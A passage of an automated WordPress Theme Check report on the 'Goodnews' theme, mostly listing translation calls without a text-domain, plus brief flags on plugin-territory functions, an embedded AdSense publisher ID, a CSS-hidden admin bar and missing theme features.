theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Learn How to get tag Id from <a href="http://www.wpbeginner.com/beginners-guide/how-to-find-post-category-tag-comments-or-user-id-in-wordpress/" target="_blank">here</a>' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Tag ID' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'item per line' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Saperate each category id with comma e.g. 5,11,20' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Exclude Posts Belonging to Category/s' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Number of items' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '-1 for show all posts' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'current time' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'show or hide current time after the news ticker' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Time Type' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Clock only' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'just show clock only without GMT+ text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Time format' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom suffix' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'upload custom icon instead the arrows icon at the first of each item' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom icon' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Content Ads' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Content Ads' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'You should see this ads on left and right of main content' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Ads on scroll Down' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Right banner' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Left banner' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Footer' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Layout' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Footer Top banner' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide Footer widgets' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Hide copyrights Area' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '2014 Powered By Wordpress, Goodnews Theme By <a href="http://www.momizat.com/">Momizat Team</a>' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Copyrights area right content' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Typography' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Main Font' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'by default the main font is "play" from google font.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this font is used for the navigation menus, widgets title, news boxes titles and more ...' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Secondary Font' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'the default is Open Sans.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this font used for headings and post titles.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Body Font' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Specify the body font properties.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Colors' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Skin' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Body Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'change background color or use image or pattern.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Body Background Link' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'You can use this for ads, works with boxed layout only.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Boxed Layout inner background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'change background color or use image or pattern.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'the main orange color will be replaced with this color.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Main Color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Headings Color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'headings include the posts titles, newsboxes titles and widgets titles.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text Selection Color ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'the background color of selected text, you can overwrite the default blue.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Read More link color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Form Elements' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Input, Textarea and select' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Borders' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Buttons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text on hover' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Topbar & bottom bar' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Menu Links and text colors' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Menu current background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Dropdown menu border color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Social Icons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Social Icons Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Social Icons color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search Box' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search box background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search box text color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search button background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search button color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Header' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Header Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Navigation ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Navigation bottom Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'the little white background and current menu item background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Navigation Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'the little white background ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Navigation Borders color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Navigation bottom Border color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Navigation Links typo' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Current/hover menu item link color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Dropdown menu arrow ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Drop down menu' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Category mega menu Highlight background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Category mega menu Highlight links color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Category mega menu post date color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Navigation Search' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search Background ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search icon color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search field background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search field text color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search field button background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Search field button text color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'News Ticker' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The Title' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Title Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Title Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The Ticker' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'borders' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Separator icon' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Current Time' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Boxes' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'The Main Box' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'the main white box used for news boxes, widgets, feature slider and most of boxes in the theme' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Alt Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'the alternate background color, you can see it in most of news boxes' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'borders' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Box bottom shadow' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Header Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Box header title' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Box Header Dots' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'upload your own pattern instead of dots' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Feature slider' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Thumbnails Arrows background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Thumbnails Arrows color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Scrolling Box' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'bullets color ' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'blog' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Posts meta color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'author name, date, category and comments' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Tabs' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Tabs titles color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Footer' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Top border' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Widgets title color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Widgets title border bottom' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Widgets links & text color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Widgets posts meta color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Widgets links border bottom' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Input, Textarea and select' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Borders' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Buttons' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text on hover' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text Widgets' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Text color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'links color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Scroll to top Button' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Scroll to top button background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Scroll to top Arrow color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Copyrights' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'copyrights background' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'copyrights text color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'copyrights links color' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom CSS' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Custom CSS' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'API\'s Authentication' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this section for connect with Different APIs such as twitter, mailchimp, etc ... some of theme function depend on this APIs so make sure you insert the Authentication information below.' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Twitter (required for using twitter widgets and social counters widget)' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'you can get twitter Authentication data by following this <a href="http://www.youtube.com/watch?v=zdSHhiHAxBA" target="_blank">tutorial</a>' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Consumer key' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Consumer secret' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Access token' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Access token secret' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Mailchimp (required for using newsletter widget)' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'this function is deprecated Use <a href="https://goo.gl/wo9fWA" target="_blank">MailChimp for WordPress plugin</a> instead' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Google+ (required for using social counter widget)' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'to get Google+ API key <a href="http://www.youtube.com/watch?v=-wPKcfEadAc" target="_blank">Follow this</a>' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Google+ API Key' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Sound Cloud (required for using social counter widget)' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'in documentation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Sound Cloud Client ID' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Behace (required for using social counter widget)' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'in documentation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Behance API key' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Weather Api key (required for using Weather widget)' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Login into <a href="http://home.openweathermap.org/" target="_blank">Open Weather Map</a> and get API key from your home' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Weather API key' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Documentation' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Theme Information 1' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '<p>This is the tab content, HTML is allowed.</p>' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Theme Information 2' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '<p>This is the tab content, HTML is allowed.</p>' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments '<p>This is the sidebar content, HTML is allowed.</p>' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Theme Options' in file theme_options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Theme Options' in file theme_options.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Online Demo' in file theme_options.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'RTL Demo' in file theme_options.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'Remove <img src="', /framework/metaboxes/img/trash.png alt=x>, 'framework' in file posts-st.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'Add Slide <img src="', /framework/metaboxes/img/add.png alt=+>, 'framework' in file posts-st.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'Remove <img src="', /framework/metaboxes/img/trash.png alt=x>, 'framework' in file portfolio-st.php.Found a translation function that has an incorrect number of arguments. Function _e, with the arguments 'Add Slide <img src="', /framework/metaboxes/img/add.png alt=+>, 'framework' in file portfolio-st.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Update' in file ads-content-metaboxes.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No Slug Found' in file class-setup-wizard.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'Activating Plugin' in file class-setup-wizard.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'Updating Plugin' in file class-setup-wizard.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'Installing Plugin' in file class-setup-wizard.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'Success' in file class-setup-wizard.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'Theme &rsaquo; Setup Wizard' in file class-setup-wizard.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Print' in file momizat_functions.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Posts layout' in file momizat_functions.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Gallery' in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Audio' in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Video' in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Chat' in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Show more Button" in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments "On click" in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Hider dots pattern" in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Show more Button" in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments "On click" in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Hider dots pattern" in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Hider dots pattern" in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Default' in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Ajax' in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Show more Button" in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments "On click" in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments "Hider dots pattern" in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'None' in file builder.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Please Go to options -> API\'s Authentication and add the weather API key' in file weather.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'Custom Logo' in file goodnews.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Install Required Plugins' in file plugins.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Install Plugins' in file plugins.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Installing Plugin: %s' in file plugins.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Something went wrong with the plugin API.' in file plugins.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.' in file plugins.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.' in file plugins.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.' in file plugins.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.' in file plugins.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.' in file plugins.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.' in file plugins.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'The following addons needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following addons need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.' in file plugins.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.' in file plugins.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Begin installing plugin', 'Begin installing plugins' in file plugins.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Activate installed plugin', 'Activate installed plugins' in file plugins.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Return to Required Plugins Installer' in file plugins.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Plugin activated successfully.' in file plugins.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'All plugins installed and activated successfully. %s' in file plugins.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'You must be <a href="%s">logged in</a> to post a comment.' in file comments.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'theme' in file footer.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are js_composer, theme, woocommerce, buddypress, framework, ?page=momizat_options&tab=5, >APIs Authentication</a>, framewrok, nav-menu-roles, meza, momizat-core, momizat-page-builder, online-shopping, tgmpa, envato, themes, redux-framework-demo, redux-framework, themecheck, /framework/metaboxes/img/trash.png alt=x>, /framework/metaboxes/img/add.png alt=+>, rwmb, bbpress.
  5. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  6. Security breaches : Presence of Google advertising codeFound pub-0124769903883498 in file misc.php. 133: 'client_id' => 'ca-pub-0124769903883498',
  7. Hidden admin bar : Hidden admin Bar in CSSThemes should not hide admin bar. Detected in file main.min.css.
  8. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  9. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  10. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  11. I18N implementation : Proper use of _e(Possible variable $widget_name found in translation function in addons.php. Translation function calls should not contain PHP variables.
  12. I18N implementation : Proper use of ___all(Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls 